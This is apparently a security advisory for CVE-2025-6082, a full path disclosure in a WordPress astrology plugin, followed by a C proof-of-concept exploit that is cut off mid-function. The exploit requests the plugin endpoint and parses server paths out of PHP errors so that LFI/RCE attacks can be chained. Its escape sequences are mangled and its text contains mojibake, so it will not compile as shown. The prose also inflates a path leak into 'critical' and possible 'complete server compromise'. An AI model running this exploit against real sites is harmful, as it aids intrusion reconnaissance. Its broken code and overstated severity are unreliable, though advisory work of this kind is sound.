Overview
The Birth Chart Compatibility WordPress Plugin version 2.0 has been identified with a critical vulnerability, designated as CVE-2025-6082. This flaw allows for a full path disclosure, exposing sensitive file paths on the server. Such vulnerabilities can lead to significant security risks, as they can provide attackers with valuable information about the server’s structure and configuration.
Technical Details
This vulnerability occurs due to improper error handling within the plugin. When the plugin encounters an error, it discloses the full path of the script being executed. This is particularly concerning for web applications, as it can reveal directory structures, file locations, and possibly sensitive information related to other installed plugins or themes.
For instance, if an attacker sends a malformed request to the plugin, the server responds with an error message that includes the absolute path to the plugin files. This information can be leveraged to craft targeted attacks, such as exploiting other vulnerabilities or gaining unauthorized access to sensitive areas of the website.
Impact
The potential consequences of this vulnerability are severe. By exposing full path details, attackers can perform reconnaissance on the target server, increasing the likelihood of a successful exploit. This could lead to data breaches, unauthorized access to confidential information, or even complete server compromise. Websites using this plugin are at risk, particularly those that handle sensitive user data.
Mitigation
To protect against CVE-2025-6082, it is crucial for website administrators to update the Birth Chart Compatibility Plugin to the latest version, which includes patches for this vulnerability. Regularly updating plugins and themes is a best practice in cybersecurity, as it mitigates the risk of known vulnerabilities being exploited.
Additionally, implementing robust error handling and logging practices can help minimize the exposure of sensitive information. Security professionals should consider employing web application firewalls (WAFs) to filter out malicious traffic and enhance the overall security posture of their WordPress installations. Regular security audits and vulnerability assessments can further safeguard against potential exploits.
Proof of Concept (PoC)
/*
* Exploit Title : Birth Chart Compatibility WordPress Plugin 2.0 - Full Path Disclosure
* Author : Byte Reaper
* Telegram : @ByteReaper0
* CVE : CVE-2025-6082
* Software Link : https://frp.wordpress.org/plugins/birth-chart-compatibility/
* Description : ProofβofβConcept exploits the Full Path Disclosure bug in the
* βBirth Chart Compatibilityβ WordPress plugin (<=v2.0). It sends
* an HTTP GET request to the pluginβs index.php endpoint, captures
* the resulting PHP warning or fatal error, and parses the serverβs
* filesystem path (e.g. β/var/www/html/wp-content/plugins/β¦β or
* βC:\xampp\htdocs\β¦β). Revealing this path aids attackers in
* chaining further LFI/RCE or reconnaissance attacks.
*/
#include<stdio.h>
#include"argparse.h"
#include<string.h>
#include <stdlib.h>
#include <curl/curl.h>
#include <unistd.h>
#define FULL 2300
const char *url = NULL;
const char *cookies=NULL;
int selecetCookie = 0;
int verbose = 0;
void exitSyscall()
{
__asm__ volatile
(
"xor %%rdi, %%rdint"
"mov $0x3C, %%raxnt"
"syscallnt"
:
:
:"rax", "rdi"
);
}
const char *keyFound[] =
{
"Warning:",
"Fatal error:",
"/var/www/",
"C:\xampp\"
};
struct Mem
{
char *buffer;
size_t len;
};
size_t write_cb(void *ptr, size_t size, size_t nmemb, void *userdata)
{
size_t total = size * nmemb;
struct Mem *m = (struct Mem *)userdata;
char *tmp = realloc(m->buffer, m->len + total + 1);
if (tmp == NULL)
{
printf("e[1;31m[-] Failed to allocate memory!e[0mn");
exitSyscall();
}
m->buffer = tmp;
memcpy(&(m->buffer[m->len]), ptr, total);
m->len += total;
m->buffer[m->len] = '